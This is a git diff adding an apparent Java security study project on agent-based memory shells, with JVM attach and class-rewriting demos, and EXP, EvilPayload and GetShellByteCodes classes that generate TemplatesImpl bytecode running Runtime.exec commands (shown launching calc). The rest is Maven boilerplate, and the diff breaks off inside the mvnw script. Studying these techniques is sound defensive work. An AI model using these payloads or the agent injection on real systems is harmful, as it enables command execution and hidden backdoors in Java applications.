index 00000000..23ab8172
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/java/com/drunkbaby/get_PID.java
@@ -0,0 +1,25 @@
+package com.drunkbaby;
+
+import com.sun.tools.attach.VirtualMachine;
+import com.sun.tools.attach.VirtualMachineDescriptor;
+
+import java.util.List;
+
+import com.sun.tools.attach.VirtualMachine;
+import com.sun.tools.attach.VirtualMachineDescriptor;
+
+import java.util.List;
+
+public class get_PID {
+ public static void main(String[] args) {
+
+ List<virtualmachinedescriptor> list = VirtualMachine.list();
+ for(VirtualMachineDescriptor vmd : list){
+
+ //遍历每一个正在运行的JVM,如果JVM名称为get_PID则返回其PID
+ if(vmd.displayName().equals("get_PID"))
+ System.out.println(vmd.id());
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/META-INF/MAINFEST.MF b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/META-INF/MAINFEST.MF
new file mode 100644
index 00000000..956cebd0
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/META-INF/MAINFEST.MF
@@ -0,0 +1,4 @@
+Manifest-Version: 1.0
+Agent-Class: com.drunkbaby.Java_Agent_agentmain
+Can-Redefine-Classes: true
+Can-Retransform-Classes: true
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/archetype-resources/pom.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/archetype-resources/pom.xml
new file mode 100644
index 00000000..823f9934
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/archetype-resources/pom.xml
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$Agentmain</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/archetype-resources/src/main/java/App.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/archetype-resources/src/main/java/App.java
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/archetype-resources/src/main/java/App.java
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/archetype-resources/src/test/java/AppTest.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/archetype-resources/src/test/java/AppTest.java
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Agentmain/src/main/resources/archetype-resources/src/test/java/AppTest.java
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/.gitignore b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/.gitignore
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/.gitignore
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/pom.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/pom.xml
new file mode 100644
index 00000000..b05f3253
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/pom.xml
@@ -0,0 +1,57 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>org.example</groupid>
+ <artifactid>Instrumentation</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ <name>Archetype - Instrumentation</name>
+ <url>http://maven.apache.org</url>
+
+ <dependencies>
+ <dependency>
+ <groupid>org.javassist</groupid>
+ <artifactid>javassist</artifactid>
+ <version>3.27.0-GA</version>
+ </dependency>
+ <dependency>
+ <groupid>commons-collections</groupid>
+ <artifactid>commons-collections</artifactid>
+ <version>3.2.1</version>
+ </dependency>
+ <dependency>
+ <groupid>com.sun</groupid>
+ <artifactid>tools</artifactid>
+ <version>1.8.0</version>
+ <scope>system</scope>
+ <systempath>D:\\SoftWares\\LanguageEnv\\Java\8円u321\\lib\\tools.jar</systempath>
+ </dependency>
+ </dependencies>
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-assembly-plugin</artifactid>
+ <version>2.6</version>
+ <configuration>
+ <descriptorrefs>
+ <descriptorref>jar-with-dependencies</descriptorref>
+ </descriptorrefs>
+ <archive>
+ <manifestfile>
+ src/main/resources/META-INF/maven/MAINFEST.MF
+ </manifestfile>
+ </archive>
+ </configuration>
+ </plugin>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <configuration>
+ <source>6</source>
+ <target>6</target>
+ </configuration>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/Hello_Transform.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/Hello_Transform.java
new file mode 100644
index 00000000..b1f90dfb
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/Hello_Transform.java
@@ -0,0 +1,48 @@
+package AgentShell;
+
+import javassist.ClassClassPath;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtMethod;
+
+import java.lang.instrument.ClassFileTransformer;
+import java.lang.instrument.IllegalClassFormatException;
+import java.security.ProtectionDomain;
+
+public class Hello_Transform implements ClassFileTransformer {
+
+ @Override
+ public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
+ try {
+
+ //获取CtClass 对象的容器 ClassPool
+ ClassPool classPool = ClassPool.getDefault();
+
+ //添加额外的类搜索路径
+ if (classBeingRedefined != null) {
+ ClassClassPath ccp = new ClassClassPath(classBeingRedefined);
+ classPool.insertClassPath(ccp);
+ }
+
+ //获取目标类
+ CtClass ctClass = classPool.get("AgentShell.Sleep_Hello");
+ System.out.println(ctClass);
+
+ //获取目标方法
+ CtMethod ctMethod = ctClass.getDeclaredMethod("hello");
+
+ //设置方法体
+ String body = "{System.out.println(\"Hacker!\");}";
+ ctMethod.setBody(body);
+
+ //返回目标类字节码
+ byte[] bytes = ctClass.toBytecode();
+ return bytes;
+
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+ return null;
+ }
+}
+
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/Inject_Agent.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/Inject_Agent.java
new file mode 100644
index 00000000..840b4880
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/Inject_Agent.java
@@ -0,0 +1,27 @@
+package AgentShell;
+
+import com.sun.tools.attach.*;
+
+import java.io.IOException;
+import java.util.List;
+
+public class Inject_Agent {
+ public static void main(String[] args) throws IOException, AttachNotSupportedException, AgentLoadException, AgentInitializationException, AttachNotSupportedException, AgentLoadException, AgentInitializationException, AgentLoadException, AgentInitializationException, AttachNotSupportedException, AgentLoadException, AgentInitializationException, AgentLoadException, AgentInitializationException, AgentLoadException, AgentInitializationException {
+ //调用VirtualMachine.list()获取正在运行的JVM列表
+ List<virtualmachinedescriptor> list = VirtualMachine.list();
+ for(VirtualMachineDescriptor vmd : list){
+ System.out.println(vmd.displayName());
+ //遍历每一个正在运行的JVM,如果JVM名称为Sleep_Hello则连接该JVM并加载特定Agent
+ if(vmd.displayName().equals("AgentShell.Sleep_Hello")){
+
+ //连接指定JVM
+ VirtualMachine virtualMachine = VirtualMachine.attach(vmd.id());
+ //加载Agent
+ virtualMachine.loadAgent("E:\\Coding\\Java\\Java-Agent-Memshell\\Instrumentation\\target\\Instrumentation-1.0-SNAPSHOT-jar-with-dependencies.jar");
+ //断开JVM连接
+ virtualMachine.detach();
+ }
+
+ }
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/Sleep_Hello.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/Sleep_Hello.java
new file mode 100644
index 00000000..77b8b8a4
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/Sleep_Hello.java
@@ -0,0 +1,16 @@
+package AgentShell;
+
+import static java.lang.Thread.sleep;
+
+public class Sleep_Hello {
+ public static void main(String[] args) throws InterruptedException {
+ while(true) {
+ hello();
+ sleep(3000);
+ }
+ }
+ public static void hello(){
+ System.out.println("Hello World!");
+ }
+}
+
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/agentmain_transform.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/agentmain_transform.java
new file mode 100644
index 00000000..b46a8e3b
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/AgentShell/agentmain_transform.java
@@ -0,0 +1,20 @@
+package AgentShell;
+
+import java.lang.instrument.Instrumentation;
+import java.lang.instrument.UnmodifiableClassException;
+
+public class agentmain_transform {
+ public static void agentmain(String args, Instrumentation inst) throws InterruptedException, UnmodifiableClassException {
+ Class [] classes = inst.getAllLoadedClasses();
+
+ //获取目标JVM加载的全部类
+ for(Class cls : classes){
+ if (cls.getName().equals("AgentShell.Sleep_Hello")){
+
+ //添加一个transformer到Instrumentation,并重新触发目标类加载
+ inst.addTransformer(new Hello_Transform(),true);
+ inst.retransformClasses(cls);
+ }
+ }
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/SimpleInstrumentation/Hello_Sleep.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/SimpleInstrumentation/Hello_Sleep.java
new file mode 100644
index 00000000..618226ce
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/SimpleInstrumentation/Hello_Sleep.java
@@ -0,0 +1,15 @@
+package SimpleInstrumentation;
+
+import static java.lang.Thread.sleep;
+
+public class Hello_Sleep {
+ public static void main(String[] args) throws InterruptedException {
+ while(true) {
+ hello();
+ sleep(3000);
+ }
+ }
+ public static void hello(){
+ System.out.println("Hello World!");
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/SimpleInstrumentation/Java_Agent_agentmain_Instrumentation.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/SimpleInstrumentation/Java_Agent_agentmain_Instrumentation.java
new file mode 100644
index 00000000..6f7f9ff5
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/SimpleInstrumentation/Java_Agent_agentmain_Instrumentation.java
@@ -0,0 +1,15 @@
+package SimpleInstrumentation;
+
+import java.lang.instrument.Instrumentation;
+
+public class Java_Agent_agentmain_Instrumentation {
+ public static void agentmain(String args, Instrumentation inst) throws InterruptedException {
+ Class [] classes = inst.getAllLoadedClasses();
+
+ for(Class cls : classes){
+ System.out.println("------------------------------------------");
+ System.out.println("加载类: "+cls.getName());
+ System.out.println("是否可被修改: "+inst.isModifiableClass(cls));
+ }
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/EXP.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/EXP.java
new file mode 100644
index 00000000..cd58da70
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/EXP.java
@@ -0,0 +1,77 @@
+package javassist;
+
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InstantiateTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+
+import javax.xml.transform.Templates;
+import java.io.*;
+import java.lang.reflect.Field;
+import java.util.Base64;
+import java.util.HashMap;
+import java.util.Map;
+
+public class EXP {
+ public static void setValue(String name, Object target, Object value) {
+ try {
+ Field field = target.getClass().getDeclaredField(name);
+ field.setAccessible(true);
+ field.set(target, value);
+ } catch (Exception ignore) {
+ }
+ }
+
+
+ public static void setValue(Object target, String name, Object value) throws Exception {
+ Class c = target.getClass();
+ Field field = c.getDeclaredField(name);
+ field.setAccessible(true);
+ field.set(target,value);
+ }
+
+ public static byte[] getTemplatesImpl(String cmd) {
+ try {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass("Evil");
+ CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
+ ctClass.setSuperclass(superClass);
+ CtConstructor constructor = ctClass.makeClassInitializer();
+ constructor.setBody(" try {\n" +
+ " Runtime.getRuntime().exec(\"" + cmd +
+ "\");\n" +
+ " } catch (Exception ignored) {\n" +
+ " }");
+ byte[] bytes = ctClass.toBytecode();
+ ctClass.writeFile("E:\\Coding\\Java\\Java-Agent-Memshell\\Instrumentation\\src\\main\\java\\javassist");
+ ctClass.defrost();
+ return bytes;
+ } catch (Exception e) {
+ e.printStackTrace();
+ return new byte[]{};
+ }
+ }
+
+ public static void main(String[] args) throws Exception {
+
+ TemplatesImpl templates = new TemplatesImpl();
+ setValue(templates,"_name", "aaa");
+
+ byte[] code = getTemplatesImpl("calc");
+ byte[][] bytecodes = {code};
+ setValue(templates, "_bytecodes", bytecodes);
+ setValue(templates,"_tfactory", new TransformerFactoryImpl());
+
+ templates.newTransformer();
+
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/EvilPayload.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/EvilPayload.java
new file mode 100644
index 00000000..4eda5395
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/EvilPayload.java
@@ -0,0 +1,39 @@
+package javassist;
+
+import java.io.File;
+import java.io.FileOutputStream;
+
+public class EvilPayload {
+
+ public static byte[] getTemplatesImpl(String cmd) {
+ try {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass("Evil");
+ CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
+ ctClass.setSuperclass(superClass);
+ CtConstructor constructor = ctClass.makeClassInitializer();
+ constructor.setBody(" try {\n" +
+ " Runtime.getRuntime().exec(\"" + cmd +
+ "\");\n" +
+ " } catch (Exception ignored) {\n" +
+ " }");
+ byte[] bytes = ctClass.toBytecode();
+ ctClass.defrost();
+ return bytes;
+ } catch (Exception e) {
+ e.printStackTrace();
+ return new byte[]{};
+ }
+ }
+
+
+ public static void writeShell() throws Exception {
+ byte[] shell = EvilPayload.getTemplatesImpl("Calc");
+ FileOutputStream fileOutputStream = new FileOutputStream(new File("S.class"));
+ fileOutputStream.write(shell);
+ }
+
+ public static void main(String[] args) throws Exception {
+ writeShell();
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/GetShellByteCodes.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/GetShellByteCodes.java
new file mode 100644
index 00000000..a25beae4
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/GetShellByteCodes.java
@@ -0,0 +1,37 @@
+package javassist;
+
+import javassist.*;
+
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+
+public class GetShellByteCodes {
+
+ public static byte[] getTemplatesImpl(String cmd){
+ try {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass("A");
+ CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
+ ctClass.setSuperclass(superClass);
+ CtConstructor constructor = CtNewConstructor.make("public A(){Runtime.getRuntime().exec(\"" + cmd + "\");\n}", ctClass);
+ ctClass.addConstructor(constructor);
+ byte[] bytes = ctClass.toBytecode();
+ ctClass.defrost();
+ return bytes;
+
+ }catch (Exception e){
+ e.printStackTrace();
+ return new byte[]{};
+ }
+ }
+
+ public static void WriteShell() throws IOException {
+ byte[] shell = GetShellByteCodes.getTemplatesImpl("calc");
+ FileOutputStream fileOutputStream = new FileOutputStream(new File("S"));
+ fileOutputStream.write(shell);
+ }
+ public static void main(String[] args) throws NotFoundException, CannotCompileException, IOException {
+ WriteShell();
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/Javassist_Test.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/Javassist_Test.java
new file mode 100644
index 00000000..41a9fb20
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/Javassist_Test.java
@@ -0,0 +1,49 @@
+package javassist;
+
+import java.lang.reflect.Modifier;
+
+public class Javassist_Test {
+ public static void Create_Person() throws Exception {
+
+ //获取 CtClass 对象的容器 ClassPool
+ ClassPool classPool = ClassPool.getDefault();
+
+ //创建一个新类 Javassist.Learning.Person
+ CtClass ctClass = classPool.makeClass("javassist.Person");
+
+ //创建一个类属性 name
+ CtField ctField1 = new CtField(classPool.get("java.lang.String"), "name", ctClass);
+ //设置属性访问符
+ ctField1.setModifiers(Modifier.PRIVATE);
+ //将 name 属性添加进 Person 中,并设置初始值为 Drunkbaby
+ ctClass.addField(ctField1, CtField.Initializer.constant("Drunkbaby"));
+
+ //向 Person 类中添加 setter 和 getter
+ ctClass.addMethod(CtNewMethod.setter("setName", ctField1));
+ ctClass.addMethod(CtNewMethod.getter("getName", ctField1));
+
+ //创建一个无参构造
+ CtConstructor ctConstructor = new CtConstructor(new CtClass[]{}, ctClass);
+ //设置方法体
+ ctConstructor.setBody("{name = \"Drunkbaby\";}");
+ //向Person类中添加无参构造
+ ctClass.addConstructor(ctConstructor);
+
+ //创建一个类方法printName
+ CtMethod ctMethod = new CtMethod(CtClass.voidType,"printName", new CtClass[]{}, ctClass);
+ //设置方法访问符
+ ctMethod.setModifiers(Modifier.PRIVATE);
+ //设置方法体
+ ctMethod.setBody("{System.out.println(name);}");
+ //将该方法添加进Person中
+ ctClass.addMethod(ctMethod);
+
+ //将生成的字节码写入文件
+ ctClass.writeFile("E:\\Coding\\Java\\Java-Agent-Memshell\\Instrumentation\\src\\main\\java");
+ }
+
+ public static void main(String[] args) throws Exception {
+ Create_Person();
+ }
+
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/Person.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/Person.java
new file mode 100644
index 00000000..baf1f661
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/java/javassist/Person.java
@@ -0,0 +1,4 @@
+package javassist;
+
+public class Person {
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/META-INF/maven/MAINFEST.MF b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/META-INF/maven/MAINFEST.MF
new file mode 100644
index 00000000..f72cd988
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/META-INF/maven/MAINFEST.MF
@@ -0,0 +1,4 @@
+Manifest-Version: 1.0
+Agent-Class: AgentShell.agentmain_transform
+Can-Redefine-Classes: true
+Can-Retransform-Classes: true
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/META-INF/maven/archetype.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/META-INF/maven/archetype.xml
new file mode 100644
index 00000000..3761615b
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/META-INF/maven/archetype.xml
@@ -0,0 +1,9 @@
+<archetype>
+ <id>Instrumentation</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/archetype-resources/pom.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/archetype-resources/pom.xml
new file mode 100644
index 00000000..ea30030f
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/archetype-resources/pom.xml
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$Instrumentation</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/archetype-resources/src/main/java/App.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/archetype-resources/src/main/java/App.java
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/archetype-resources/src/main/java/App.java
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/archetype-resources/src/test/java/AppTest.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/archetype-resources/src/test/java/AppTest.java
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Instrumentation/src/main/resources/archetype-resources/src/test/java/AppTest.java
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/.gitignore b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/.gitignore
new file mode 100644
index 00000000..549e00a2
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/.gitignore
@@ -0,0 +1,33 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/.mvn/wrapper/maven-wrapper.jar b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/.mvn/wrapper/maven-wrapper.jar
new file mode 100644
index 00000000..c1dd12f1
Binary files /dev/null and b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/.mvn/wrapper/maven-wrapper.jar differ
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/.mvn/wrapper/maven-wrapper.properties b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/.mvn/wrapper/maven-wrapper.properties
new file mode 100644
index 00000000..b7cb93e7
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/.mvn/wrapper/maven-wrapper.properties
@@ -0,0 +1,2 @@
+distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.4/apache-maven-3.8.4-bin.zip
+wrapperUrl=https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/mvnw b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/mvnw
new file mode 100644
index 00000000..8a8fb228
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/mvnw
@@ -0,0 +1,316 @@
+#!/bin/sh
+# ----------------------------------------------------------------------------
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements. See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership. The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License. You may obtain a copy of the License at
+#
+# https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations
+# under the License.
+# ----------------------------------------------------------------------------
+
+# ----------------------------------------------------------------------------
+# Maven Start Up Batch script
+#
+# Required ENV vars:
+# ------------------
+# JAVA_HOME - location of a JDK home dir
+#
+# Optional ENV vars
+# -----------------
+# M2_HOME - location of maven2's installed home dir
+# MAVEN_OPTS - parameters passed to the Java VM when running Maven
+# e.g. to debug Maven itself, use
+# set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
+# MAVEN_SKIP_RC - flag to disable loading of mavenrc files
+# ----------------------------------------------------------------------------
+
+if [ -z "$MAVEN_SKIP_RC" ] ; then
+
